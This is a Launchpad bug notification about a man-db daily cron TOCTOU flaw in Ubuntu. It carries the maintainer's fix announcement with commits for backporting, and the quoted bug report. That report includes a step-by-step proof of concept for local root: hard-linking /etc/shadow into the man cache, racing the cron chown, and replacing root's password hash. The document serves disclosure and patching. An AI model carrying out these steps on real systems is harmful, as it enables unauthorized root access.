[Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

Sun Dec 11 16:51:35 UTC 2016

Apologies for my long delay in dealing with these bugs, both reported by
halfdog.  Fixes turned out to be quite complicated, since in part they
involved unwinding incorrect logic from nearly 20 years ago and ensuring
that everything else built on that was appropriately adjusted.

Here are the relevant sections from my release announcement, which
should appear at https://lists.nongnu.org/archive/html/man-db-
announce/2016-12/msg00000.html in the near future:

  * SECURITY: Eliminate dangerous setgid-root directories.  In the default
    configuration, cache files and directories are now owned by man:man
    rather than man:root; man and mandb are now setgid man as well as
    setuid man (except in the --disable-setuid case).  This is a much
    simpler and safer solution to the original problem that caused my
    predecessor to make directories setgid root, and doesn't introduce any
    interesting new privilege since the man group's only real purpose is
    to be the man user's primary group and nothing in cache directories is
    group-writeable.

    Maintainers of distribution packagers should take care to review their
    installation rules in light of this change.

    As far as I know this has no CVE ID, but it is described here:

http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/

  [...]

  Notes for distributors
  ======================

  The security fix above was quite involved.  If you're trying to backport
  it to a stable release, then you should probably consider at least these
  commits:

    e62b9edafe00c51e52863718cb2eb1e29385230e Rename some anomalous x* functions
    9ab9f3dd9b0d5f290c635995559332c1710e5b4d man(1): Fix gcc warnings
    0f8b5518949866075c25787bdc4e9c064597c21e Separate cache owner from --enable-setuid option
    94b9d1e2a14ce8790d7c73df00d0bbd9e40cd437 Handle cleanup stack more safely
    c7f7daa9b2ffbbf4c45a2b168802a51acc2263c0 Make --disable-cache-owner imply --disable-setuid
    31552334cecee82809059ec598a37d9ea82683f0 Eliminate dangerous setgid-root directories
    755a9551c45da82f99d0ad8e46ef756afbeafb3f Fix distcheck following cache-owner/setuid changes
    75701f7fd9a00108abeb851792231b3d9bc2a67d Fix systemd tmpfiles group/perms of /var/cache/man

  Feel free to contact me if you have difficulty.  You should also
  consider
  http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/,
  which could not be fixed without fixing the above bug first; while this
  bug was in Debian-specific cron jobs, others may have copied them.

I've uploaded 2.7.6-1 to unstable with fixes for these vulnerabilities.
I'd be happy to help out the Debian and Ubuntu security teams with
backports if they need it, although hopefully the above list of git
commits is enough to get started.

** Changed in: man-db (Ubuntu)
     Assignee: (unassigned) => Colin Watson (cjwatson)

** Changed in: man-db (Ubuntu)
   Importance: Medium => High

** Changed in: man-db (Ubuntu)
       Status: Confirmed => Fix Committed

-- 
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1482786

Title:
  man-db daily cron job TOCTOU bug when processing catman pages

Status in apport package in Ubuntu:
  Confirmed
Status in man-db package in Ubuntu:
  Fix Committed
Status in pam package in Ubuntu:
  Confirmed
Status in shadow package in Ubuntu:
  Confirmed

Bug description:
  The daily mandb cleanup job for old catman pages changes the
  permissions of all non-man files to user man. The problematic code is:

  # expunge old catman pages which have not been read in a week
  if [ -d /var/cache/man ]; then
    cd /
    if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then
      find /var/cache/man -ignore_readdir_race ! -user man -print0 | \
        xargs -r0 chown -f man || true
    fi
    ...

  By creating a hard link and winning the race, user man may escalate
  privileges to user root. See [1] for full explanation.

  man# mkdir -p /var/cache/man/etc
  man# ln /var/crash/.lock /var/cache/man/etc/shadow
  man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath /var/cache/man/etc --LinkTarget /etc
  ... Wait till daily cronjob was run
  man# cp /etc/shadow .
  man# sed -r -e 's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:99999:7:::/' /etc/shadow > x
  man# cat x > /etc/shadow; rm x
  man# su -s /bin/sh (password is 123)
  root# cat shadow > /etc/shadow; chown root /etc/shadow

  # lsb_release -rd
  Description:    Ubuntu 14.04.3 LTS
  Release:        14.04

  # apt-cache policy man-db
  man-db:
    Installed: 2.6.7.1-1ubuntu1
    Candidate: 2.6.7.1-1ubuntu1
    Version table:
   *** 2.6.7.1-1ubuntu1 0
          500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 Packages
          100 /var/lib/dpkg/status
       2.6.7.1-1 0
          500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages

  [1]
  http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions